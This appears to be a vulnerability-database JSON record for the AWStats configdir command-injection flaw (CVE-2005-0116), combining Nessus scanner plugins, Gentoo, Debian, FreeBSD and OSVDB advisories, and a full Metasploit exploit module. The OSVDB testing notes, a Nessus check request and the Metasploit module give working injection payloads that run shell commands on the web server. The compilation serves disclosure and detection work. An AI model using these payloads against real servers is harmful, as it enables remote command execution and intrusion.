eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\n\nif (!isnull(matches))\n{ \n dir = matches[2];\n http_check_remote_code_ka (\n\t\t\textra_dirs:make_list(dir),\n\t\t\textra_check:\"Check config file, permissions and AWStats documentation\",\n\t\t\tcheck_request:\"/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00\",\n\t\t\tcheck_result:\"uid=[0-9]+.*gid=[0-9]+.*\",\n\t\t\tcommand:\"id\" );\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:54", "description": "The remote host is affected by the vulnerability described in GLSA-200501-36\n(AWStats: Remote code execution)\n\n When 'awstats.pl' is run as a CGI script, it fails to validate specific\n inputs which are used in a Perl open() function call. Furthermore, a\n user could read log file content even when plugin rawlog was not\n enabled.\n \nImpact :\n\n A remote attacker could supply AWStats malicious input, potentially\n allowing the execution of arbitrary code with the rights of the web\n server. He could also access raw log contents.\n \nWorkaround :\n\n Making sure that AWStats does not run as a CGI script will avoid the\n issue, but we recommend that users upgrade to the latest version, which\n fixes these bugs.", "edition": 26, "published": "2005-02-14T00:00:00", "title": "GLSA-200501-36 : AWStats: Remote code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0363"], "modified": "2005-02-14T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:awstats", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200501-36.NASL", "href": "https://www.tenable.com/plugins/nessus/16427", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200501-36.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16427);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-0116\", \"CVE-2005-0362\", \"CVE-2005-0363\");\n script_xref(name:\"GLSA\", value:\"200501-36\");\n\n script_name(english:\"GLSA-200501-36 : AWStats: Remote code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200501-36\n(AWStats: Remote code execution)\n\n When 'awstats.pl' is run as a CGI script, it fails to validate specific\n inputs which are used in a Perl open() function call. Furthermore, a\n user could read log file content even when plugin rawlog was not\n enabled.\n \nImpact :\n\n A remote attacker could supply AWStats malicious input, potentially\n allowing the execution of arbitrary code with the rights of the web\n server. He could also access raw log contents.\n \nWorkaround :\n\n Making sure that AWStats does not run as a CGI script will avoid the\n issue, but we recommend that users upgrade to the latest version, which\n fixes these bugs.\"\n );\n # http://awstats.sourceforge.net/docs/awstats_changelog.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://awstats.sourceforge.io/docs/awstats_changelog.txt\"\n );\n # http://www.idefense.com/application/poi/display?id=185\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?020e4b8e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200501-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All AWStats users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-misc/awstats-6.3-r2'\n Note: Users with the vhosts USE flag set should manually use\n webapp-config to finalize the update.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AWStats configdir Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:awstats\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-misc/awstats\", unaffected:make_list(\"ge 6.3-r2\"), vulnerable:make_list(\"lt 6.3-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"AWStats\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:03:15", "description": "In addition to CAN-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. Missing input sanitising can cause arbitrary commands to be\nexecuted.", "edition": 25, "published": "2005-02-16T00:00:00", "title": "Debian DSA-682-1 : awstats - missing input sanitizing", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0438", "CVE-2005-0435", "CVE-2005-0437", "CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0436", "CVE-2005-0363"], "modified": "2005-02-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:awstats", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-682.NASL", "href": "https://www.tenable.com/plugins/nessus/16464", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-682. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16464);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-0362\", \"CVE-2005-0363\", \"CVE-2005-0435\", \"CVE-2005-0436\", \"CVE-2005-0437\", \"CVE-2005-0438\");\n script_xref(name:\"DSA\", value:\"682\");\n\n script_name(english:\"Debian DSA-682-1 : awstats - missing input sanitizing\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In addition to CAN-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. Missing input sanitising can cause arbitrary commands to be\nexecuted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=294488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-682\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the awstats package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 4.0-0.woody.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:awstats\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/02/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"awstats\", reference:\"4.0-0.woody.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:05", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0116"], "description": "\nAn iDEFENSE Security Advisory reports:\n\nRemote exploitation of an input validation vulnerability\n\t in AWStats allows attackers to execute arbitrary commands\n\t under the privileges of the web server.\nThe problem specifically exists when the application is\n\t running as a CGI script on a web server. The \"configdir\"\n\t parameter contains unfiltered user-supplied data that is\n\t utilized in a call to the Perl routine open()...\nSuccessful exploitation allows remote attackers to\n\t execute arbitrary commands under the privileges of the web\n\t server. This can lead to further compromise as it provides\n\t remote attackers with local access.\n\n", "edition": 4, "modified": "2005-02-23T00:00:00", "published": "2004-10-21T00:00:00", "id": "0F5A2B4D-694B-11D9-A9E7-0001020EED82", "href": "https://vuxml.freebsd.org/freebsd/0f5a2b4d-694b-11d9-a9e7-0001020eed82.html", "title": "awstats -- remote command execution vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2005-0116"], "edition": 1, "description": "## Vulnerability Description\nAWStats contains a flaw that may allow a malicious user to issue arbitray commands under the web server privileges. The issue is triggered when using the pipe character (|) and shell metacaracters in the 'configdir' variable of the awstat.pl script. Such input is not santitized before being passed to the perl 'open()' command to be executed.\n## Technical Description\nThe AWstats website announced that installations are safe from remote command execution if you set the variable '$!AllowToUpdateStatsFromBrowser' to '0' (off). However, subsequent testing indicates this does not fully mitigate the vulnerability.\n## Solution Description\nUpgrade to version 6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nAWStats contains a flaw that may allow a malicious user to issue arbitray commands under the web server privileges. The issue is triggered when using the pipe character (|) and shell metacaracters in the 'configdir' variable of the awstat.pl script. Such input is not santitized before being passed to the perl 'open()' command to be executed.\n## Manual Testing Notes\nhttp://[target]/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|\nhttp://[target]/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;%20touch%20evilfile;\n## References:\nVendor URL: http://awstats.sourceforge.net/\nVendor Specific News/Changelog Entry: http://awstats.sourceforge.net/docs/awstats_changelog.txt\n[Secunia Advisory ID:13893](https://secuniaresearch.flexerasoftware.com/advisories/13893/)\n[Secunia Advisory ID:14007](https://secuniaresearch.flexerasoftware.com/advisories/14007/)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200501-36.xml\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities\nOther Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2005-006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0288.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0258.html\n[CVE-2005-0116](https://vulners.com/cve/CVE-2005-0116)\nCERT VU: 272296\n", "modified": "2005-01-01T01:11:30", "published": "2005-01-01T01:11:30", "id": "OSVDB:13002", "href": "https://vulners.com/osvdb/OSVDB:13002", "title": "AWStats awstats.pl configdir Parameter Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-08-13T00:01:32", "description": "This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.\n", "published": "2007-01-05T04:28:32", "type": "metasploit", "title": "AWStats configdir Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/UNIX/WEBAPP/AWSTATS_CONFIGDIR_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AWStats configdir Remote Command Execution',\n 'Description' => %q{\n This module exploits an arbitrary command execution vulnerability in the\n AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n are vulnerable.\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-0116'],\n ['OSVDB', '13002'],\n ['BID', '12298'],\n ['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 512,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl ruby python telnet bash-tcp',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Jan 15 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]),\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI']),\n 'vars_get' =>\n {\n 'configdir' => '|echo;cat /etc/hosts;echo|'\n }\n }, 25)\n\n if (res and res.body.match(/localhost/))\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n command = Rex::Text.uri_encode(payload.encoded)\n urlconfigdir = normalize_uri(datastore['URI']) + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\"\n\n res = send_request_raw({\n 'uri' => urlconfigdir,\n 'method' => 'GET',\n 'headers' =>\n {\n 'Connection' => 'Close',\n }\n }, 25)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n\n m = res.body.match(/YYY\\n(.*)\\nYYY/m)\n\n if (m)\n print_status(\"Command output from the server:\")\n print(\"\\n\" + m[1] + \"\\n\\n\")\n else\n print_status(\"This server may not be vulnerable\")\n end\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/awstats_configdir_exec.rb"}], "debian": [{"lastseen": "2019-05-30T02:21:59", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0116", "CVE-2005-0363"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 682-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 15th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : awstats\nVulnerability : missing input sanitising\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-0363\nDebian Bug : 294488\n\nIn addition to CAN-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. Missing input sanitising can cause arbitrary commands to be\nexecuted.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 4.0-0.woody.2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 6.2-1.2.\n\nWe recommend that you upgrade your awstats package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2.dsc\n Size/MD5 checksum: 574 16e16b5bee949c6d82b8d9f7a3357d64\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2.diff.gz\n Size/MD5 checksum: 8779 8ff8db0ad2c91038043a045c0f1f2924\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0.orig.tar.gz\n Size/MD5 checksum: 472738 58b68e7d5f3be4437e64c5425eb6513e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2_all.deb\n Size/MD5 checksum: 356838 309cd1baaf3f0ffb5126bb7850d061f1\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 2, "modified": "2005-02-15T00:00:00", "published": "2005-02-15T00:00:00", "id": "DEBIAN:DSA-682-1:3FA20", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00060.html", "title": "[SECURITY] [DSA 682-1] New awstats packages fix arbitrary command execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0363"], "description": "### Background\n\nAWStats is an advanced log file analyzer and statistics generator. \n\n### Description\n\nWhen 'awstats.pl' is run as a CGI script, it fails to validate specific inputs which are used in a Perl open() function call. Furthermore, a user could read log file content even when plugin rawlog was not enabled. \n\n### Impact\n\nA remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code with the rights of the web server. He could also access raw log contents. \n\n### Workaround\n\nMaking sure that AWStats does not run as a CGI script will avoid the issue, but we recommend that users upgrade to the latest version, which fixes these bugs. \n\n### Resolution\n\nAll AWStats users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-misc/awstats-6.3-r2\"\n\nNote: Users with the vhosts USE flag set should manually use webapp-config to finalize the update.", "edition": 1, "modified": "2009-05-28T00:00:00", "published": "2005-01-25T00:00:00", "id": "GLSA-200501-36", "href": "https://security.gentoo.org/glsa/200501-36", "type": "gentoo", "title": "AWStats: Remote code execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}